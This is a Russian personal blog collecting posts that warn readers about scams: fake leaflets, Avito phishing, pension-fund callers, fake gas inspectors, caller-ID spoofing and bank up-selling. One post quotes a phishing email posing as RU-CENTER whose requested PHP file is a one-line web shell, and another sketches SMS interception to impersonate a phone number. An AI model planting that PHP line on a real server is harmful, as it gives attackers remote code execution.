Tags: мошенничество

Cat-angry

Очередное жульё

Кинули в почтовый ящик очередную бумажную листовку. Эталонное жульё, конечно. Но как убедительно втирают (картинка кликабельна).

Говорят, что эти черти не только в ящики спамят, но и по квартирам ногами ходят. Причём, в "фирменной" спецодежде, даже какие-то ксивы предъявляют.

Будьте внимательны, не ведитесь, предупредите своих пожилых родственников.

Lynx

Жулики с Avito

Вывесил на "Авито" объявление о продаже инвалидной коляски. Как водится, тут же слетелись мошенники всех сортов и размеров. Одному (а может, одной) из них мы немного подыграли. Результат смотри на скриншоте (кликабельно).

Collapse )

Чё-то даже повеселились. Смешные они. Но вообще, фишинговые сайты клепают очень качественные. И даже SSL-сертификат от Lets Encrypt прикручивают. Не будь я ITшником, наверное, купился бы на такой развод.

Lynx

Эх вы, яйцеголовые!

10 марта "Тинькофф банк" опубликовал результаты своего исследования по мошенничеству в околобанковской сфере. Рассмотрел разные виды фрода в разрезе разных социальных групп. С полной версией статьи можете ознакомиться по ссылке выше. А лично меня позабавило вот что, цитирую оттуда.

... Клиенты с учеными степенями становятся жертвами преступников в 1,5 раза чаще, чем клиенты с высшим, начальным или средним образованием. Люди с двумя и более высшими образованиями — на 30% чаще.

... Клиенты банков с ученой степенью чаще всего самостоятельно переводят деньги преступникам — например, в 2,3 раза чаще чем, клиенты с начальным и средним образованием.

... Холостые и незамужние, а также разведенные и овдовевшие клиенты становятся жертвами преступников чаще на 40–50%.

Эх вы, яйцеголовые, чего ж вы это так, а?

Интересно, где здесь причина, а где следствие. Доверчивые люди чаще добиваются успехов в науке, образованным людям не хватает времени на изучение основных правил безопасности / поведения в обществе, или же наука вытесняет из головы всё что с ней напрямую не связано?

И да, выходит, что я просто обеими ногами состою в группе риска: разведён, да ещё и с двумя высшими образованиями. По идее, я должен быть просто суперлакомой находкой для мошенников всех сортов и размеров. Это, конечно, шутка. Но в каждой шутке, как извесно, есть доля шутки. Те, кто знают меня и мою биографию очень хорошо, догадаются о чём я: уже были прецеденты. Так что если даже это исследование и не соответствует истине, то во всяком случае очень-очень близко к ней...

Cat-light

Как стырить квартиру через интернет

— Как взломать банкомат, имея ноутбук и кувалду? Очень просто! Подходишь к банкомату, разбиваешь его кувалдой, забираешь деньги и смываешься.
— А ноутбук зачем?
— Дык какой же ты хакер без компьютера?!?

Мошенники похитили квартиру в Москве через интернет

Как мне видится, глобальное решение может быть только одно: система принудительной доставки электронных сообщений для физических лиц. Наподобие той, как уже сейчас работает в некоторых регионах применительно к Почте России и автомобильным штрафам. Когда ты можешь заказное письмо получить на электронную почту. Только сделать для всего-всего, а не только для автоштрафов. И пока гражданин к этой системе не подключится, ЭЦП ему не выдавать. Плюс организовать централизованную базу данных уже выданных подписей. Если в течение года одно и то же рыло получает подписи в двух разных УЦ, то бить тревогу и проверять с особым пристрастием.

Также будет полезным перейти от централизованной технологии удостоверения рыла на манер X509 к распределенной типа PGP. Чтобы твоя электронная подпись получила необходимый для совершения сделок "вес", нужно чтобы её подтвердили бы, к примеру, не менее чем три различных инстанции. Скажем, родственник, работодатель, сосед, участковый пилиционер, клерк в МФЦ, сотрудник СОБЕСа или фиг знает кто-нибудь там ещё, но кто изначально давно и хорошо знает пациента. Увы, это всё мои влажные мечты...

Жаль будет, если из-за подобных случаев примут решение вообще похерить на корню всю систему электронного документооборота. Эти могут...

Death

#10. О**евшие жулики из НПФ

Ещё два разговора.

Первый. Всё те же самые говноеды из "Сириуса", что и в предыдущем псто. Никак не унимаются. На этот раз они застали меня в магазине, пока я стоял в очереди на кассе. Поэтому мата там нет. Чаще других встречается слово "гондоны". Не знаю насколько смешно получилось, решать вам.

Второй. Тут чуть интереснее. Звонят какие-то очередные жулики из какого-то зашкварного НПФ (негосударственного пенсионного фонда) и пытаются обманным путём уговорить меня перевести к ним накопительную часть своей пенсии. Кому интересно, с матчастью можно вкратце ознакомиться здесь: раз, два.

И ведь который раз уже отшиваю, тоже всё никак не прекратят. Если у вас большая белая зарплата, или кто-то из ваших родственников умудрился разжиться весомой накопительной частью, имейте в виду. Мне-то по большому счёту пофиг, но всё это жульё уже порядком подзадолбало постоянно названивать.

Death

Про подмену телефонного номера

Товарищ Патрон1 (ammo1) и некто "Тимофей Ви" подняли истерику на тему подмены чьего-либо телефонного номера потенциальными злоумышленниками (ссылка 1, ссылка 2). Они и правы, и не правы одновременно. Объясню почему.

Надёжин у себя пишет: "Для подмены номеров используется IP-телефония, где подмена номера - штатная функция. Не знаю, существует ли вообще решение этой проблемы." Открываю страшный секрет. IP-телефония тут ни при чём. Любой владелец любой АТСки (даже миниатюрной офисной) может при исходящих звонках прописывать у себя вообще любой Caller ID (номер вызывающего абонента). И технология установления связи здесь не имеет совершенно никакого значения: хоть медная лапша, хоть E1, хоть H323, хоть SIP, да что угодно. Вопрос только в том, проверяет ли его или нет владелец АТСки-аплинка. Тут всё зависит от условий договора между ними и степени раздолбайства последнего.

Для лучшего понимания я проведу аналогию с электронной почтой. Когда вы отправляете кому-то электрическое письмо, вы можете в графе "отправитель" написать что угодно. Хоть "tsar.of@the.world". И в общем случае (не рассматриваем пока технологии SPF и DKIM) никто никогда не сможет проверить его подлинность либо факт подмены. Но! Хорошие публичные почтовые сервера (Яндекс, Гугл и т.п.) перед выпуском вашего письма "в мир" сперва убедятся, что его отправили действительно вы, потребовав указать ваш логин и пароль. А также проведут анализ заголовка "Отправитель" на соответствие вашему аккаунту. И в случае расхождения "зарежут" такое письмо, хотя ничто не мешало бы им его пропустить.

И вторая немаловажная деталь. Когда в обмене электронной почтой участвует более двух серверов, то в общем случае валидность отправителя (не рассматриваем DKIM) могут проверить только первый или второй хосты в цепочке. Но не третий и далее по списку. Им уже приходится "верить на слово" второму, без вариантов.

В телефонии то же самое. Любой абонент априори является ненадёжным и может представиться противоположной стороне как угодно и кем угодно. В общем случае проверить его подлинность может либо самый первый узел: он знает, куда физически идёт от него провод и/или логин-пароль VoIP-клиента и/или ключи шифрования радиоканала и т.п. Либо второй узел: он осведомлён, какая номерная ёмкость присвоена первому узлу. Если же сингал ушёл дальше по цепочке, то всё, "до свидания". Там уже никто и ничего гарантировать не может.

Теперь ближе к конкретике. Тот же скайп, например (но не только он один), договорился с другими операторами связи таким образом, чтобы те не проверяли бы номера абонентов инциируемых им (скайпом) звонков. Это нужно ему для того, чтобы пользователи могли бы звонить со скайпа на мобильные телефоны, а вызываемые видели бы правильный "как будто бы мобильный" номер позвонившего. И в этом нет ничего противозаконного, так как всё по тому же самому договору скайп обязуется валидировать вызывающих абонентов сам. И он делает это путём отсылки контрольной SMSки с проверочным кодом своему подписчику. То есть условный Вася в своём скайповском профиле физически не сможет указать чужой номер телефона. А когда он начнёт кому-то звонить через скайп, то сервис проверит его по логину-паролю. Таким образом, на данном этапе возможное мошенничество исключено.

Но тут есть один тонкий момент. Допустим, хакер-Вася заразил смартфон жертвы-Пети вирусом, который пересылает Васе все SMSки с телефона Пети. Дальше объяснять надо? Вася в одно действие регистрирует в скайпе левый аккаунт, указывает в нём номер мобильного телефона Пети, с помощью своего вируса получает проверочную SMSку, подтверждает факт якобы владения Петиным номером, после чего невозбранно звонит кому угодно от имени как будто бы Пети. И для этого вовсе не требуется быть кандидатом наук или досконально разбираться в современных технологиях.

Я уверен, что нечто подобное произошло и в историях по ссылкам в начале поста. На ровном месте такие трюки конкретно в России провернуть весьма затруднительно. Потому что всякие там Роскомпозоры и прочие спецслужбы хоть и являются коррумпированными бездельниками, но за использованием телефонии и подменой номеров всё же внимательно следят. Но если каким-либо способом у злоумышленника хотя бы ненадолго появляется доступ к мобильному телефону жертвы — всё, пиши пропало. Тут уже никто не поможет.

Напоследок напоминаю традиционные элементарные общеизвестные правила безопасности.


  1. Не верить никому на слово. Всегда помнить, что человек может оказаться не тем, за кого себя выдаёт.

  2. При малейших сомнениях спрашивать внутренний номер сотрудника, вешать трубку и перезванивать в организацию самостоятельно. Нормальные банки относятся к подобному поведению клиентов совершенно спокойно и даже приветствуют такой подход.

  3. Для связи с банками завести отдельный телефон с отдельной симкой и отдельным номером. Номер никому кроме банков не сообщать. На телефон никакого дополнительного софта не ставить, без большой нужды с собой его нигде не носить.

  4. Ни при каких обстоятельствах не выпускать из рук свой незаблокированный мобильный телефон и всегда знать где он находится. Никому не давать его ни "только позвонить", ни "погонять на денек-другой", даже с другой/чужой SIM-картой внутри.

  5. Про установку сомнительного софта из неблагонадёжных источников даже писать не буду, всё равно все будут ставить.

  6. Условиться о каких-нибудь секретных вопросах / сигналах со всеми своими родственниками/близкими, по которым они смогут понять, что информация исходит действительно от вас. Например, вашей маме звонят и говорят что вас забрали в отделении полиции. А мама, прикинувшись заботливой дурочкой, берёт и спрашивает: "Ой, скажите, а мой Ванечка не забыл сегодня одеть свою дублёнку?" Зная, что у Вани никаких дублёнок никогда отродясь не было. Но это уже высший пилотаж.

И чтобы два раза не вставать, мельком затронем тему мошенничества в социальных сетях. Нередки случаи, когда взламывают чей-нибудь аккаунт, а потом начинают с него попрошайничать. Сердобольные друзья часто успевают перевести жуликам значительные суммы денег, прежде чем жертва узнает о случившемся и восстановит доступ к своей странице. Среди конкретно моих друзей подобное случалось с троими за последние пять лет. К сожалению, общие правила поведения в данной ситуации выработать довольно трудно. На всякий случай могу сказать за себя (т.е. предупреждаю вас).


  1. Дед Сергеич никогда не будет просить денег. Возможно, предмет (например, дрель или билет) или услугу (например, покормить или приютить его). Но не денег.

  2. Дед Сергеич не пользуется социальными сетями. Максимум — ретранслирует туда свои посты из ЖЖ.

  3. Дед Сергеич крайне не любит разговаривать по телефону. Если он вам позвонил — скорее всего, это не он.

  4. Электрическая почта деда Сергеича общеизвестна, и это предпочтительный способ связи с ним. При малейших сомнениях пишите туда. Если электропочту Сергеича и взломают, то он узнает об этом очень быстро.

  5. Если вам заявляют, что с Сергеичем случилась какая-то беда, то в первую очередь спросите, что на нём было надето, где он в тот момент находился и был ли он трезвым или бухим. По ответам можно с высокой степенью достоверности заподозрить обман.

Как-то так. Всем внимательности и бдительности. В комменты также приглашается тов. yalexey для рецензирования и критики.
Death

Псевдогазовщики

К моей пожилой соседке на прошлой неделе приходили липовые газовщики. Толкнули телегу о том, что жильцы якобы обязаны ставить датчики утечки газа. И развели её ажно на 27 килорублей. Причём, шосукахарактерно, я ничего не видел и не слышал несмотря на то, что большую часть времени сейчас провожу дома. Есть подозрение, что жулики действуют не вслепую, а прицельно по каким-то базам данных.

Будьте бдительны и напомните правила безопасности своим престарелым родственникам. Мои хомяки, например, из подобных соображений вообще никому дверь не открывают.

Кстати, чтоб два раза не вставать. Кто-нибудь встречал в природе видеоглазок, который умеет звонить на SIP (предпочтительно) или GSM своему хозяину при нажатии кнопки звонка?

Lynx

Забавный фрод

Приходит тут мне в электропочту письмо нижеследующего содержания, якобы от RU-CENTER.

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом vasyapupkin.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл a17x0tq15im57z0t.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения данного уведомления и находиться на сервере до 20 августа 2017 года, 22:00 (UTC+03:00), в противном случае процедура активации не будет пройдена.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Браво, я даже почти поверил. Уж больно правдоподобно звучит текст и очень похоже выполнено графическое оформление самого письма. Оно там со всеми логотипами и вообще крайне похоже на оригинальную рассылку. Но мне немного проще, я могу поглядеть на заголовки собщения и чуть-чуть понимаю в PHP. Интересно, сколько доморощенных типа веб-дизайнеров поведутся на эту шляпу и добровольно откроют у себя бэкдор добрым дядям.

Будьте внимательны. Все лгут. ©

Lozhkin

Гнойный ВТБ-БМ

Как известно, великий и могучий трансцендентный ВТБ (ВнешТоргБанк) работает с физическими лицами только через одну из своих реинкарнаций: ВТБ-отец (он же ВТБ24), ВТБ-сын (он же Почта-Банк) и ВТБ-святой_дух (он же ВТБ-БМ). Сегодня довелось столкнуться с последним по причине надобности подтвердить свою личность на госуслугах моему другу. Что можно сделать, помимо прочего, например в их офисе.

Подходит он, как обычно, к операционистке. Популярно и недвусмысленно объясняет чего хочет, протягивает паспорт. Та отвечает "ща, вам придёт СМСка, сообщите разовый код из неё". Хм. Странно. Вообще-то уже только это должно было насторожить. Ну ладно, посмотрим что там в этой SMSке. А там вот что.

Я уже как-то слегка напрягся. Смотрим, что будет дальше. А дальше операционистка без зазрения совести распечатала огромный талмуд документов для перехода в НПФ (негосударственный пенсионный фонд) и сказала "на, подписывай".

Разумеется, мы всегда смотрим, что подписываем. Сделали круглые глаза, сказали "чё за дичь вы нам втираете, мы это не просили и подписывать не будем". Та прикинулась дурочкой, мол "ой, извините". Тут же засунула эту кипу бумаги в шредер и отдала паспорт соседней операционистке. Типа "эй, Маш, активируй пожалуйста аккаунт на госуслугах".

Вот же ж хитрые какие жопы! В погоне за своими бонусами-фигонусами не побрезгуют ничем! И это хорошо, что друг вовремя включил собаку-подозреваку. А то потом долго удивлялся бы, каким это образом он внезапно оказался в НПФ ВТБ. Понятно, что по большому счёту это всё однохерственно монопенисуально. Но тем не менее. Просили одно, а подсунули другое. И главное, из-за этого пришлось вместо пяти минут проторчать в отделении 20. За что посылаю традиционные лучи ненависти и поноса нерадивой операционистке в частности и всему ВТБ-БМ в целом.

А ещё мне подумалось: а сколько народа вот так не посмотрят что за документы им предложили подписать и доверчиво "подмахнут" бумаги? Надо полагать, подобные прецеденты уже имели место быть.

А на закусь вот вам ещё один кусок прикола всё из того же ВТБ-БМ. Цените: совместные с РПЦ кредитные карты "Дар святыне". Специально к пасхе, не иначе. "Впиши своё имя в историю". А ну быстро вписал, сука, кому говорю!!!11 :-D

P.S. Статистика показывает, что в период великого поста количество верующих несколько уменьшается, а на пасху увеличивается и стремительно достигает своего пика.

Death

Enter.ru загнулся

Судя по всем признакам, магазину Enter.ru настал белый пушной зверёк.

Я по старой памяти заказал там себе кой-какую мелочёвку по предоплате. Как выяснилось, очень зря. Ни "мелочёвки", ни предоплаты. Ни на электрическую почту, ни на телефон никто не отвечает. Кирдык, короче.

Попробую вернуть взад бабло через ChargeBack. Заодно как раз и посмотрю, насколько хорошо и оперативно Тинькофф умеет это делать. О результатах (если таковые будут) доложу. А так пока, предупреждаю на всякий случай. Вдруг кому окажется кстати.